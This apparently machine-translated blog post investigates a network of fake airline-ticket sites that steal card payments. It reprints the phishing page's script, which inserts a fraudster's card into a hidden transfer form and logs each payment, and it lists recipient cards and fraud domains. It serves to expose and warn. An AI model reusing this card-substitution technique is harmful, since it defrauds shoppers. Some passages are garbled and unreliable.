Esta publicação se concentrará em toda uma rede de sites fraudulentos que trabalham há muito tempo com o único objetivo de roubar informações do cartão bancário e retirar todo o dinheiro disponível desses cartões. Nesse esquema, os serviços de empresas e bancos conhecidos são utilizados em diferentes estágios. Como o Yandex (Pesquisa, Direto, YandexMoney, Cartões), Promsvyazbank, Tinkoff Bank e, provavelmente, outros.
Esta história começou recentemente. Apenas cinco dias atrás, e pode-se dizer que ainda não acabou. Um amigo meu se voltou para mim para uma consulta perguntando se era possível fechar de alguma forma o “site ruim” ...Então, o que aconteceu?Meu amigo queria comprar ingressos e decidiu que a maneira mais fácil de fazer isso era fazer uma pergunta ao Yandex. A Yandex enviou um dos primeiros links para um determinado site para uma solicitação simples como “os ingressos mais baratos para Anapa” para um site que serve para pesquisar e comprar ingressos baratos sem comissão. Esse link provavelmente estava no bloco de anúncios principal. Seguindo o link, meu amigo encontrou ingressos adequados, fez um pedido e chegou à página de pagamento usando um cartão bancário ...Este site para uma pessoa comum, se você não entrar em detalhes, pode se tornar um site completamente comum para procurar ingressos e não causar suspeitas. Domínio _aviapromo.eu_É assim que a página principal se parece. A captura de tela foi salva apenas no telefone.
Esta é uma pesquisa de tickets: O
pedido é feito :
Esta é a página de pagamento:
Nas fotos, meu pedido de teste, que fiz para descobrir como funciona este site.Meu amigo pagou pelos ingressos. Ao pagar por SMS, chegaram os códigos de confirmação do 3d Secure, que, como geralmente acontece, precisavam ser inseridos no navegador na página correspondente. Tendo recebido "recibos de rota" pelo correio e acreditando que os ingressos haviam sido comprados, meu amigo tratou de seus assuntos.No dia seguinte, "SMS incompreensível" começou a chegar ao telefone. Primeiro, um SMS foi enviado para ser debitado com uma soma de 2 rublos e, no mesmo momento, esses 2 rublos foram devolvidos ao cartão com a nota "cancelamento de compra". Após mais 2 horas, repetiu-se uma baixa e um reembolso incompreensíveis de 2 rublos. E depois de um minuto, algo incrível começou. Eles deduziram 17.700 rublos do cartão. Após mais 10 minutos, outros 17.700 rublos foram baixados. Após mais 10 minutos, eles tentaram amortecer 11800 rublos . A última operação não desapareceu apenas porque o cartão ficou sem dinheiro. Penso que, se houvesse um saldo maior no cartão, as baixas continuariam a cada 10 minutos até a recusa. O histórico das operações descritas é claramente visível na foto do título - esta é uma captura de tela do SMS do Sberbank chegando ao telefone.No momento do primeiro "SMS incompreensível de cerca de 2 rublos", embora parecesse suspeito, o cartão não estava bloqueado. Todas as cobranças subsequentes foram concluídas em 20 a 30 minutos. Meu amigo na época estava em transporte público. Tentei entrar em contato com o Sberbank para bloquear o cartão. Mas, como geralmente acontece, o banco ofereceu-se para apertar os botões no menu de voz e esperar na fila. Não funcionou para bloquear rapidamente o cartão através da central de atendimento do banco. Mas o aplicativo no smartphone, através do qual também seria possível bloquear o cartão, não foi instalado. O cartão foi bloqueado, mas já era tarde demais - o dinheiro havia vazado. No dia seguinte, meu amigo escreveu uma declaração ao Sberbank. O aplicativo está atualmente em consideração. O cartão foi reemitido.Dois dias depois, quando o cartão foi bloqueado, houve uma tentativa de cobrar 11800r do cartão e outro dia depois uma nova tentativa de amortizar outros 23600 rublos . I.e. isso mais uma vez confirma que os golpistas não tiveram freios.
E para a sobremesa, apesar de todas essas baixas inesperadas, verificou-se que não havia armadura na companhia aérea e nunca a possuía. I.e. voos não foram reservados. Tudo era uma farsa e o dinheiro foi em uma direção desconhecida.Como resultado, o cartão foi roubado (perdas por bilhetes pagos e débitos subseqüentes) em um total de 47.377 rublos. E poderia haver muito mais.Agora vamos tentar descobrir o que realmente aconteceu e onde foi possível detectar uma captura.1. Um domínio na zona da UE deveria ter sido pelo menos alerta.2. Além de procurar passagens aéreas, havia apenas algumas páginas no site cujo objetivo era fazer alarde.3. Se você se aprofundar, a empresa indicada na página PSRN pertencia à empresa, que foi fechada em 2011. E o nome da empresa no extrato do registro e o site não corresponde, o site é parcialmente alterado. Verifique as informações no PSRN, TIN e o nome das pessoas jurídicas no banco de dados da administração fiscal egrul.nalog.ru.4. As classificações do site de T&C e PR são zero (isso é visível naqueles casos raros quando o painel do webmaster ou algo semelhante é instalado no navegador).5. A principal coisa que deve alertar. Deveria ter havido um pagamento sem comissão, conforme indicado no site, 5900 para cada ingresso, e o compromisso "Write-off 5900.00 P2P PSBANK" foi enviado ao SMS do banco e, depois de pagar por esses 5900, chegou um SMS dizendo que 5988,50 rublos foram baixados. O que é "P2P", é claro, nem todo mundo sabe. Pode-se procurar. "P2P" é um serviço de transferência de cartão para cartão. E o valor do débito é superior ao valor do pagamento, porque o banco através do qual o pagamento foi feito cobra uma comissão por isso. I.e. na realidade, o dinheiro supostamente pago pelas passagens aéreas foi transferido para o cartão bancário de alguém por meio do serviço PSBANKa (Promsvyazbank). Ao mesmo tempo, o banco enviou o código de verificação 3D Secure ao comprador, que o comprador, inocente, inseriu no navegador.6. Se, com a transferência para o cartão, for claro para mim que o titular do cartão foi enganado ao inserir o código 3D Secure, ele mesmo com débito subsequente sem verificar o 3D Secure, a situação não está totalmente clara para mim. Nunca me deparei com uma situação em que o Sberbank na Internet permita que você pague algo sem verificar o 3D Secure (sem confirmação via SMS). A única exceção quando o SMS não é solicitado é quando as operações são realizadas através do aplicativo móvel SberbankOnline no telefone. Mas o telefone não foi roubado e os dados da conta pessoal não foram roubados. Obviamente, apenas as informações do cartão de crédito do meu amigo foram recebidas. E, tendo apenas os dados do cartão, o dinheiro foi debitado ao usar o serviço YM (Yandex.Money) em favor do Yandex.Direct (rede de publicidade Yandex).Existe claramente algum tipo de falha no sistema de segurança e a questão é levantada para o Sberbank ou para o Yandex, como eles permitem que isso seja feito.O resultado é aproximadamente a seguinte imagem do trabalho de um site fraudulento:O site através da publicidade no Yandex.Direct atrai visitantes. Sem publicidade, esses sites chegam ao topo da emissão é quase impossível. O site parece um pouco semelhante aos sites normais. Encontrar voos e assentos gratuitos funciona muito bem. Para isso, o site aceita a solicitação do visitante, pede que ele espere, envia a solicitação para outro site que possua dados reais sobre passagens aéreas, o excesso é cortado da resposta recebida e as informações preparadas são divulgadas em sua página. É possível que os preços estejam ligeiramente ajustados (não verifiquei os preços). Em seguida, o visitante faz um pedido inserindo seus dados. A entrada de dados tem a mesma aparência de muitos outros sites de emissão de bilhetes. Depois de inserir os dados e confirmar o pedido, o comprador é informado do código do pedido e recebe 24 horas para pagar.Ao pagar, a página original de um dos bancos com o serviço de tradução P2P é refeita de certa maneira (mais sobre isso abaixo) e é incorporada a um site fraudulento. O "comprador" de passagens aéreas, se ele não perceber a captura, transfere o dinheiro para algum cartão bancário estrangeiro. Ao mesmo tempo, os dados do cartão bancário do "comprador" são interceptados e subsequentemente usados para debitar - ao mesmo tempo, a conta de alguma conta no Yandex.Direct é reabastecida para publicidade subseqüente e busca de novas vítimas. Então tudo é igual em um círculo.Ao mesmo tempo, os dados do cartão bancário do "comprador" são interceptados e subsequentemente usados para debitar - ao mesmo tempo, a conta de alguma conta no Yandex.Direct é reabastecida para publicidade subseqüente e busca de novas vítimas. Então tudo é igual em um círculo.Ao mesmo tempo, os dados do cartão bancário do "comprador" são interceptados e subsequentemente usados para debitar - ao mesmo tempo, a conta de alguma conta no Yandex.Direct é reabastecida para publicidade subseqüente e busca de novas vítimas. Então tudo é igual em um círculo.Depois de toda essa história, uma declaração foi escrita para a polícia (sob consideração), para o Sberbank (sob consideração), para Yandex, para o provedor de hospedagem, etc. Osite fraudulento foi hospedado na hospedagem do FirstVDS. De acordo com minha declaração com uma descrição detalhada, a conta do site fraudulento foi bloqueada. Verdade, em meio dia eles novamente desbloqueados. Mas, de acordo com a afirmação repetida, eles bloquearam novamente (espero, para sempre), referindo-se ao fato de que diferentes departamentos do fornecedor não foram compreendidos. Obviamente, este não é um bloco completo - os fraudadores podem mudar de hospedagem.Tendo conquistado pelo menos uma vitória pequena e temporária, mas com o fechamento do site, foi necessário resolver a questão das passagens aéreas. E que surpresa foi quando, em uma consulta de pesquisa semelhante, o Yandex na primeira linha do bloco de anúncios forneceu outro site com um design ligeiramente modificado, mas com quase a mesma funcionalidade e um mecanismo semelhante. Seu objetivo é enganar os visitantes, roubar informações sobre dinheiro e cartão de crédito. I.e. depois que um site é estrangulado, um novo site aparece imediatamente (mais precisamente, funcionava antes, é que nem todos aparecem na publicidade imediatamente). O endereço do outro site para a "suposta venda de passagens aéreas" é _avia-scanners.ru_. Se os representantes do Yandex quiserem verificar, aqui está o link completo do Yandex.Direct (que contém o identificador do anunciante._http://avia-scanners.ru/?utm_source=yandex&utm_medium=cpc&utm_campaign=21628812&utm_content=2877643372&utm_term=%D0%B0%D0%B2%D0%B8%D0%B0%D0%B1%D0%B8%D0%BB%D0%B5%D1%82%D1%8B%20%D0%BF%D0%BE%20%D1%80%D0%BE%D1%81%D1%81%D0%B8%D0%B8%20%D0%B4%D0%B5%D1%88%D0%B5%D0%B2%D0%BE
O fato de este site ser fraudulento pode ser visto imediatamente, sem se aprofundar nos detalhes técnicos - o NIF indicado não existe, o OGRN indicado não existe, o nome legal indicado não existe, o endereço indicado não existe, etc. O TIN é geralmente indicado com um número de doze dígitos, o que acontece apenas com empresários e indivíduos.Na página de título, há imagens que devem levar às páginas de download de aplicativos móveis (na AppStore, no Google Play e na loja do Windows Phone). Mas todas essas imagens não contêm links para aplicativos móveis.
Dessa vez, foi decidido analisar com mais detalhes como esse site engana os usuários na página de pagamento. A tecnologia não era complicada.Esta é a aparência da página de pagamento no site "busca de companhia aérea".
Vamos ver o código fonte da página. Vemos pastas suspeitas "... P2P ..." com vários scripts. Nesses scripts, não encontrei nada de interessante que pudesse estar associado ao roubo de fundos. Basicamente, havia provavelmente scripts bancários não modificados, que serão discutidos abaixo.Mas o endereço canônico da página é interessante para nós. Vemos aqui que, de fato, a página de serviço do Banco Tinkov (_www.tinkoff.ru/cardtocard/_) está quase completamente incluída no site fraudulento. E aqui o iframe não é usado. Aqui, ao usar o processamento intermediário no servidor do provedor de hospedagem, a página é baixada do site Tinkov, depois é modificada no servidor e quase completamente projetada com pequenos “bônus”.
Meu palpite era que o código HTML deveria ter um bloco DIV oculto, um formulário oculto ou algo semelhante. E provavelmente alguns desses blocos ocultos. E a suposição foi confirmada. Pressionamos o navegador F12 (ferramentas para desenvolvimento web). Encontramos o bloco oculto que precisamos. Vemos na coluna à direita sua propriedade display: none.
Clique na caixa de seleção para desativar a propriedade display: none e ... O segredo se torna aparente.Vemos um formulário pré-preenchido com o número do cartão de crédito de outra pessoa, para o qual nosso dinheiro deve ir.
E aqui está a página original do Tinkoff Bank. Gosta mesmo? I.e. o que esta acontecendo O formulário está parcialmente preenchido. Tudo o que é supérfluo está oculto neste formulário (um bloco com um cartão de destinatário); algumas partes podem até não estar ocultas, mas cortadas no servidor. E esta página, de forma alterada, é inserida nos visitantes do site, na esperança de que eles não suspeitem de nada.
E para a sobremesa, aqui está o código html de origem com o número do cartão bancário do destinatário pré-preenchido.
E aqui está outro pedaço interessante de código.
A mesma peça com o script no formato de texto abaixo:Vamos tentar descobrir o que está acontecendo no código.O código contém uma matriz com os números dos cartões dos destinatários. Esses números são inseridos no formulário de pagamento com um script. Teoricamente, pode haver sete cartões diferentes do destinatário e, a cada tentativa mal sucedida de pagamento, o número do cartão deve mudar. Mas, em vez de sete números diferentes, o mesmo número é definido várias vezes. I.e. se a tentativa falhar, a próxima tentativa será com o mesmo número de cartão de destinatário.E, para garantir a ordem, a cada tentativa de pagamento, os dados são transferidos para uma página desse site fraudulento, que registra tudo para a contabilidade. À noite, provavelmente, um “contador” virá e verificará os lançamentos no diário.$("#card_number").on('blur', function () {
$("#transfer__card_number").change();
});
function refr() {
$("#transfer__card_number").change();
}
popitka = 0;
function addpay(title, status) {
var newcards = [
'5106 2160 0313 4297',
'5106 2160 0313 4297',
'5106 2160 0313 4297',
'5106 2160 0313 4297',
'5106 2160 0313 4297',
'5106 2160 0313 4297',
'5106 2160 0313 4297',
];
if (status == 0) {
$('#card_number2').val(newcards[popitka]);
$('#card_number2').change();
popitka = popitka + 1;
}
$.ajax({
url: 'http://avia-scanners.ru/addpay.php?sum=' + 3272 + '&status=' + status + '&title=' + title + '&code=lyyPt',
success: function () {
xhr.abort();
}
});
}
$(document).ready(function () {
$("#card_number2").keyup();
$('#card_number2').change();
});
Cada vez que você visita a página de pagamento (você pode, por exemplo, experimentar diferentes navegadores), um novo número de cartão é inserido no campo do beneficiário. Aqui estão os números de cartões nos quais os golpistas costumavam sacar dinheiro roubando-o dos visitantes do site de passagens aéreas. Estes cartões são definitivamente muito mais. Estou dando números caso alguém esteja interessado no artigo e queira verificar ...5106 2160 0313 42975106 2160 0408 70155106 2160 0310 8804O que é semelhante nesses mapas? É isso mesmo, os dígitos iniciais são 5106 21 ...Vamos tentar pesquisar no banco de dados dos números BIN dos bancos.Aqui está um resultado tão interessante:Banco emissor: YANDEX MONEY NBCI.LLCTipo de cartão: MASTERCARDAleatoriamente, os fraudadores usam publicidade do serviço de transferência de dinheiro Yandex (Yandex.Direct), Yandex.Money e, além disso, através de bancos de terceiros, sacam fundos para cartões bancários emitidos pela Yandex. Absolutamente, o Yandex não está envolvido nessas fraudes, mas o Yandex pode ajudar bastante na redução do número de transações fraudulentas. Talvez para isso algumas regras ou regulamentos precisem ser alterados. Também escrevi cartas para Yandex. Eles aceitaram a informação, como descartá-la, eu não sei. Eles não puderam me ajudar com o bloqueio de fundos, mas escreveram: "A seu pedido, realizamos uma investigação e tomamos todas as medidas necessárias ..." 10 a 15 minutos vem a resposta de uma pessoa viva.A julgar pelos relatórios que encontrei na Internet, esses sites estão em funcionamento há muito tempo e o número de vítimas é bastante grande. E de acordo com estimativas, pode haver muitas vítimas. Há relatos na Internet sobre vítimas e há um ano, e há mensagens postadas há cinco dias sobre passagens aéreas pagas em um site fraudulento sobre o qual escrevi no primeiro semestre.Mas isso não é tudo. Muitos sites fraudulentos de passagens aéreas têm uma coisa em comum que os une exclusivamente e indica que eles pertencem ao mesmo grupo. Aqui não vou escrever que tipo de recurso é esse, para não ajudar os invasores. Mas aqui estão alguns sites fraudulentos deste grupo encontrados em alguns minutos: _avialex.ru_, _avia-kassa.ru.com_, _flyseven.ru_, _aviasalesdirectly.ru_, _avia-run.ru_, _aviasalle.com_.Alguns desses sites já estão bloqueados e na lista negra de diferentes otzoviks. O último site da lista agora fingia ser um coelho. Este era outro site que aguardava sua melhor hora. Também está localizado na hospedagem FirstVDS. O site desativou temporariamente a funcionalidade fraudulenta depois que eu pedi para bloqueá-lo. Portanto, até que foi bloqueado.I.e. vemos que este não é um trabalho único. Os fraudadores usam um esquema comprovado há anos. São utilizados domínios em diferentes zonas, diferentes serviços de hospedagem, serviços de diferentes bancos para transferências de cartão para cartão (exceto Tinkov e Promsvyazbank, pode haver outros), o dinheiro é retirado para um grande número de cartões. Se apenas 47 cartões puderem ser facilmente roubados de um cartão, quais valores podem ser roubados no valor total?Da minha parte, escrevi muitas cartas e declarações diferentes. Mas é difícil derrotar toda a rede para uma pessoa, a menos que você dedique 100% do seu tempo.O principal é ter cuidado ao pagar bilhetes em sites desconhecidos e, em seguida, será mais difícil para os fraudadores.UDPSobre _avia-scanners.ru_ Eu não escrevi uma declaração ao provedor (a hospedagem neste site sprinthost.ru é diferente da primeira). Este site foi deixado para que os leitores da publicação pudessem dissecá-lo e desmontá-lo. Agora, este site não está mais funcionando.Alguns dos leitores conseguiram brincar com ele. Mas agora não está disponível. Na página principal "Proibido / Você não tem permissão para acessar / neste servidor. Servidor Apache / 2.4.17 em avia-scanners.ru Porta 80 »
Por que _avia-scanners.ru_ ficou indisponível, não há informações exatas. Talvez não tenha suportado a carga, talvez o representante do fornecedor tenha lido o artigo e fechou o site, talvez os representantes da TCS ou Sberbank tenham lido o artigo e tenham escrito para o fornecedor, talvez o Yandex tenha ajudado de alguma forma, talvez um dos representantes das agências de aplicação da lei ou talvez o administrador deste site, um período de tempo de exibição regular e, depois de ler o artigo, ele percebeu que estava errado e decidiu seguir o caminho da correção.De qualquer forma, sua atividade ajudou a fechar outro site de phishing. Espero que issoevite que um dos potenciais compradores de passagens aéreas entre na história desagradável do UDP2 (27/09/2016)Como escrevi, o número de sites pode ser muito grande. Graças a triton, ele apontou nos comentários mais três novos exatamente os mesmos sites fraudulentos _flying-avia.ru_, _scanner-ticket.ru_, _scanner-aero.ru_. Estou certo de que haverá ou aparecerá no futuro próximo outros sites. No final desta publicação, colocarei uma tabela de resumo. Se alguém encontrar esses sites, estou pronto para adicionar informações sobre eles a esta tabela.Enquanto os três novos sites encontrados estão funcionando e aqueles que não tiveram tempo de dissecar sites anteriores antes de serem fechados, podem fazê-lo agora. Esses novos três sites funcionam quase da mesma maneira, seguindo o mesmo padrão do analisado no artigo _avia-scanners.ru_. Alteração mínima do projeto, alteração mínima das informações de contato. Pequenas coisas como um NIF de nove dígitos não são levadas em consideração. É utilizado o mesmo serviço bancário Tinkov, que é claramente visível nas capturas de tela.A publicação foi longa. Portanto, algumas das novas capturas de tela serão removidas sob o spoiler.Capturas de tela das primeiras páginas de quatro novos sites. Sim, este não é um site._scanner-ticket.ru_
_flying-avia.ru_
_scanner-aero.ru_
_aviasalle.com_
Páginas de pagamento em novos sites. O mesmo serviço P2P do TCS Bank_flying-avia.ru_,
_flying-avia.ru_, . «».
_scanner-ticket.ru_,
_scanner-aero.ru_,
Os seguintes números de cartão de crédito foram encontrados nos três novos sites para os quais os golpistas retiram fundos:5106 2160 0451 0834 recebido em _flying-avia.ru_5106 2160 0909 7977 recebido em_scanner-ticket.ru_5106 2160 0451 0834 recebido em_scanner-aero.ru_Dois em três esses sites oferecem a retirada de fundos para o mesmo cartão. Além disso, esses dois sites, embora localizados no mesmo provedor de hospedagem, funcionam em IPs diferentes (consulte a tabela abaixo). E, novamente, novos cartões são emitidos pelo Yandex.Bank.Além disso, em novos sites ao pagar, você pode escolher entre dois métodos de pagamento. O primeiro é através de cartões, o segundo através de terminais. Nos primeiros locais descritos, se eu não perdi nada, não era possível pagar por "passagens aéreas" pelo terminal. Vamos ver como o pagamento é feito através do terminal. Instruções detalhadas sobre "como pagar através do terminal" estão publicadas nos sites e são longas, colocadas sob o spoiler. Não há truques neste manual. Os compradores desatentos são convidados a simplesmente chegar ao terminal e colocar dinheiro na carteira QIWI de alguém. O número de telefone da carteira é indicado nas instruções.Pagando bilhetes pelo terminal. Instruções no site _scanner-ticket_en | Sites de fraude de passagens aéreas |
|---|
| _avialex.ru_ | | Arquivamento |
| _avia-kassa.ru.com_ | | Arquivamento |
| _flyseven.ru_ | | Arquivamento |
| _aviasalesdirectly.ru_ | | Arquivamento |
| _avia-run.ru_ | | Arquivamento |
| _aviasalle.com_ | Fornecedor FirstVDS | , |
| _aviapromo.eu_ | FirstVDS | 22.09.2016 |
| _avia-scanners.ru_ | Sprinthost, IP 141.8.195.50 | geektimes 26.09.2016 |
| _flying-avia.ru_ | Sprinthost, IP 141.8.195.50 | 27.09.2016 geektimes |
| _scanner-ticket.ru_ | Sprinthost, IP 141.8.195.50 | 27.09.2016 geektimes |
| _scanner-aero.ru_ | Sprinthost, IP 141.8.195.138 | 27.09.2016 geektimes |
| _scaner-avia.ru_ | Sprinthost, IP 141.8.195.138 | 27.09.2016 geektimes |
| _pilotavia.ru_ | TheFirst-RU clients (WebDC Msk), IP 188.120.250.184 | _aviapromo.eu_ geektimes 28.09.2016 — « » |
| _letofly.biz_ | | . _aviapromo.eu_, geektimes 29.09.2016 , . , . |
| _avia.netprosolution.co_ | | , , _aviapromo.eu_. |
Nota na lista de sites na tabela. Quando comecei a compilar esta tabela, suspeitava que havia muitos sites semelhantes, mas não suspeitava quantos. Uma simples pesquisa nos mecanismos de pesquisa fornece links para pelo menos uma dúzia de sites semelhantes. Alguns deles ainda estão nos mecanismos de pesquisa, mas não estão mais disponíveis (você pode ver apenas a versão em cache). A lista de sites semelhantes em operação anterior, mas já bloqueados, é superior a 400pcs. Portanto, com sua permissão, não suplementarei mais esta tabela, com exceção de sites especiais, cuja análise pode ser interessante.Aqui está um exemplo de cem sites fraudulentos bloqueados que vendem passagens aéreas_fly-4you.ru_
_economavia.ru_
_nticket.ru_
_red-avia.com_
_lykafe.ru_
_max-fly.ru_
_tourfly.biz_
_bilet-poisk.ru_
_masterfly.ru_
_future-fly.ru_
_tiptopair.ru_
_100bilet.ru_
_go-go-travel.com_
_point-avia.com_
_avianeo.ru_
_itarifyaviabilety.ru_
_eg-avia.ru_
_horoshoairbilety.ru_
_aviakassa-sales.ru_
_gogoavia.com_
_avia-toptickets.ru_
_poiskovik-airline.ru_
_ticket-online.ru_
_avia-fun.com_
_disavia.ru_
_expressaviabilet.ru_
_moi-avia.ru_
_-._
_slim-avia.org_
_fly-info.ru_
_aviakassaonline24.ru_
_bestavias.ru_
_oaviabiletychelny.ru_
_etoavia.ru_
_aviakassabiletov.ru_
_avia-online24.ru_
_onlinepolet.ru_
_tip-trip.biz_
_disaero.ru_
_ticket-planet.ru_
_flyglobal.ru_
_mainavia.ru_
_ticket2avia.ru_
_online-airlines.ru_
_super-avia.ru_
_fun-avia.com_
_avia-book.ru_
_poiskvnebo.ru_
_avia-world.ru_
_aviachild.ru_
_aviaonline.org_
_deshevoavia.ru_
_vnemli.ru_
_moifly.ru_
_-._
_grundfly.ru_
_airbiletyonline.ru_
_fast-fly.ru_
_zaaviabiletom.ru_
_splash-avia.com_
_bystro-aviabileti.ru_
_aviabulet.ru_
_xdavia.ru_
_mytripbonus.ru_
_broniruem-online.ru_
_newgoaaviabilety.ru_
_search-fly.ru_
_privat-air.org_
_biletnasamoletonline.ru_
_smilefly.ru_
_x-avia.ru_
_raido-rent.com_
_avia-rsexpress.ru_
_aviaspecmontag.ru_
_just-avia.ru_
_onlyavia.ru_
_letimairlanes.ru_
_avia-russia.ru_
_trip-avia.com_
_aviagold.ru_
_deshevo-poletet.ru_
_avia-kafe.ru_
_poisk-avia.ru_
_fly-land.ru_
_aviaup.ru_
_-._
_airlines-travel.ru_
_cafe-avia.ru_
_avia-cloud.com_
_fly-corp.ru_
_eco-avia.com_
_ticket-aero24.ru_
_turscannerpro.ru_
_roomticket.ru_
_flyfiaryav.ru_
_express-avia.ru_
_broniruem24.ru_
_wow-avia.ru_
_sky-trips.ru_
_aviabin.ru_
Revisões negativas, histórias de roubo de dinheiro na compra de ingressos, listas negras podem ser encontradas em vários sites da Internet. Nessa escala, na estrutura deste artigo, não faz sentido atualizar a tabela no modo de espera. A escala das ações de fraudadores em sites que supostamente vendem passagens aéreas (e às vezes ferroviárias) é compreensível. Quando existe um site, nem sempre é possível descobrir e capturar um fraudador. Quando existem dezenas e centenas de sites, então, com certeza, os golpistas não podem funcionar de maneira a não deixar vestígios. Os provedores, os bancos, as empresas de Internet, os registradores de domínio ou qualquer outro lugar devem ser deixados para trás. Portanto, se houver uma decisão intencional de alguém, todo esse esquema poderá ser investigado e considerado responsável por ele.UDP3:Graças ao usuário semb. Nos comentários, ele apontou para outro site _pilotavia.ru_.Este site é digno de nota por parecer duas gotas no site _aviapromo.eu_ (o site em que o herói deste artigo teve a “imprudência de comprar passagens aéreas”. Este site continua funcionando. Este não é apenas um site semelhante, mas o mesmo site, simplesmente hospedado em outro domínio e hospedagem. Agora você pode ver mais sobre o funcionamento do site. Para quem deseja experimentar, pode começar imediatamente com o link _https: //pilotavia.ru/? code = BX3FKT_ (este é um link com um pedido feito, no qual há uma oportunidade vá para o pagamento. O prazo para pagamento é de 24 horas).A página inicial, a página de pesquisa de voos e a página de pagamento_pilotavia.ru_ são iguais ao primeiro site do artigo Na próxima página do painel do webmaster para download de arquivos, você pode ver que os dados reais sobre a disponibilidade de assentos nos voos são obtidos no site não-fraudulento normal aviacassa_ru. É provável que os dados de texto sejam ajustados no servidor e os links para imagens permaneçam inalterados.
Para quem perguntou sobre https e detalhes do certificado. Houve uma oportunidade de verificar.O site usa uma conexão segura e um certificado da Let's Encrypt. Uma característica interessante é que o certificado é emitido por um período de três meses. Isso é provavelmente para salvar? Avalie realisticamente o tempo de vida de um site.
Outro detalhe. O site usa o serviço Yandex Webvisor. Visível mediante solicitação na parte inferior do painel na imagem abaixo. Para aqueles que não estão atualizados, este é um serviço muito conveniente para registrar o comportamento do usuário no site. Em seguida, você pode assistir a algo semelhante ao vídeo sobre o que os usuários fizeram no site. Usar um navegador da web significa algumas coisas. - Um fraudador registrou um site no Yandex.Metrica possui estatísticas detalhadas sobre as ações do usuário em seu site. Talvez até os números dos cartões sejam obtidos a partir dos dados do webvisor, embora seja mais provável que os números dos cartões sejam registrados programaticamente no site. O outro lado da moeda é que o Yandex tem um histórico completo de todas as operações no site de phishing. Ou seja, teoricamente, se as agências policiais tiverem acesso a essas informações (se isso for possível em princípio),você pode restaurar completamente a imagem de cada caso de fraude e entender o escopo das transações fraudulentas.
Agora, sobre o mecanismo de roubo de dinheiro _pilotavia.ru_ e, portanto, _aviapromo.eu_. Esses sites não usam a página Tinkoff Bank. Como o roubo de dinheiro descrito neste artigo foi realizado por meio do P2P PSBANK (Promsvyazbank), supunha-se que, da mesma forma, a página do Promsvyazbank seja alterada e apresentada ao usuário. Mas, ao analisar o código HTML da página de pagamento, não encontrei nenhuma parte das páginas de nenhum banco, as janelas internas do iframe não são usadas, os scripts não são usados, e a página em si é muito simples e não se parece com a página do Promsvyazbank.<form class="b-card-feature-list clearfix" id="formPay" action="payp2p.php" method="post">
De fato, esta página é apenas um formulário para inserir um número de cartão. Quando o formulário é confirmado, o processamento é transferido para o programa payp2p.php. Este programa pode fazer qualquer coisa, mas seu código não está disponível para nós - o código é executado no lado do servidor. Provavelmente, este programa recebe os dados do cartão e, de forma programática, no lado do servidor, de alguma forma, preenche o formulário Promsvyazbank e o usuário é solicitado a fornecer um código de confirmação 3D Secure. Esses cartões são armazenados naturalmente e podem ser usados para cobranças adicionais em diferentes sites. Se alguém puder calcular o algoritmo deste site em mais detalhes, ficarei grato. De acordo com um comunicado à polícia, uma investigação foi iniciada - qualquer informação que possa revelar um esquema criminal é bem-vinda.UDP4 (27/09/2016): informações para quem pediu.No momento, o dinheiro não era devolvido para pagamentos enviados para os cartões de outras pessoas ou para pagamentos enviados para o Yandex.Direct. (Para pagamentos ao Yandex.Direct, um extrato foi enviado ao banco menos de 24 horas após o débito). Não há resposta oficial do Sberbank (15 dias ainda não se passaram). Hoje, para o investigador, foi feito um extrato de papel na filial do Sberbank. Valores baixados. Não há informações adicionais sobre os beneficiários no extrato.Extrair fragmento
Declarações completas do Sberbank sob o spoiler UDP5 (30/09/2016). O usuário Vad_R da PM enviou sua história real de "compra de ingressos", na qual ~ 20500 rublos foram roubados de seu cartão há quatro meses. Acrescento este caso à publicação para mostrar o que mais existem "maneiras de obter dinheiro relativamente honesto da população". Descrição e detalhes sob o spoiler.Em resumo, nos primeiros estágios, o registro é muito bonito e, depois de inserir os dados do cartão do banco, eles são simplesmente enviados a golpistas que nem se deram ao trabalho de se disfarçar. Na última mensagem que o usuário vê, há pelo menos três erros gramaticais / ortográficos. Provavelmente, neste caso, perdedores trabalhavam ...
Depois de inserir os dados do cartão, o dinheiro foi retirado através da transferência para o cartão de outra pessoa através do serviço MMBANKa (Banco de Moscou). Não foi possível devolver o dinheiro. Uma declaração à polícia foi escrita. Caso encerrado "por falta de crime"Detalhes deste caso.
, , .
.
.. ..
, . , №1 «» .
() , , , _forair.ru_ 19967,45
, 04 2016 _forair.ru_ . 3 - , – . 11 . - , , .
, , -, , CVV 2 . , 19653,00 ( ) , 14 . ( )
_forair.ru_ , – . , , . .
. № 2787878 (06.06.2016)
, , , .
...
, , . . 05.06.2016 , 13.06.2016 . 8 . , . , . ? , « ». . .
===========================================================================
,
Vad_R UDP6 (06/06/2016) O Sberbank respondeu ao apelo da vítima de 20/09/2016 . Eles escreveram que o período de revisão foi prorrogado por mais 30 dias. O dinheiro no momento não retornou.UDP7 (19/10/2016) O dinheiro baixado para o Yandex.Direct retornou em 12/10/2016 (17700r + 17700r). O retorno ocorreu 22 dias após o envio do pedido ao banco.O dinheiro que foi para o cartão de outra pessoa ~ 5900r + 5900r + a comissão no momento em 13/11/2016 não retornou.SMS com confirmação de devolução.
UDP8 (13/11/2016)A segunda parte da publicação foi publicada com a continuação: Passagens aéreas baratas ... Uma rede de sites fraudulentos roubando dinheiro de cartões. Investigação - Parte 2. O que o Promsvyazbank tem a ver com isso?UDP9 (03/02/2017)Escrevi um novo artigo, até certo ponto relacionado a esta publicação: o Yandex ignora a verificação 3D Secure ao pagar por anúncios no Yandex.Direct usando cartões bancários.